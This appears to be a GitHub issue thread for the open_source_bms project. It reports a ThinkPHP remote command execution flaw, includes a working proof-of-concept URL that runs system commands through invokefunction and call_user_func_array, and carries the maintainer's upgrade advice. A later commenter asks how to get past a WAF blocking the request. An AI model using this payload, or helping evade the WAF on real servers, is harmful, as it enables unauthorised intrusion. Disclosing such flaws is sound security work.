open_source_bms icon indicating copy to clipboard operation
open_source_bms copied to clipboard

Published 20 hours ago verified publisher icon xyl-tools

There is A RCE vulnerability in your system.

Open CCkiller opened this issue 6 years ago • 2 comments

The RCE(Remote Command Execution) vulnerability is triggered by a http request.Successfully executed the command "whoami". poc: http://58.82.XXX.XXX:8080/public//?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami default default

CCkiller avatar Jan 12 '19 03:01 CCkiller

This is the official vulnerability of ThinkPHP, please upgrade the core framework to the latest version of the official.

xyl-tools avatar Jan 14 '19 01:01 xyl-tools

hi, Is there a way to bypass the waf? I get a 403 forbidden error.

velocity16902 avatar Jun 02 '20 16:06 velocity16902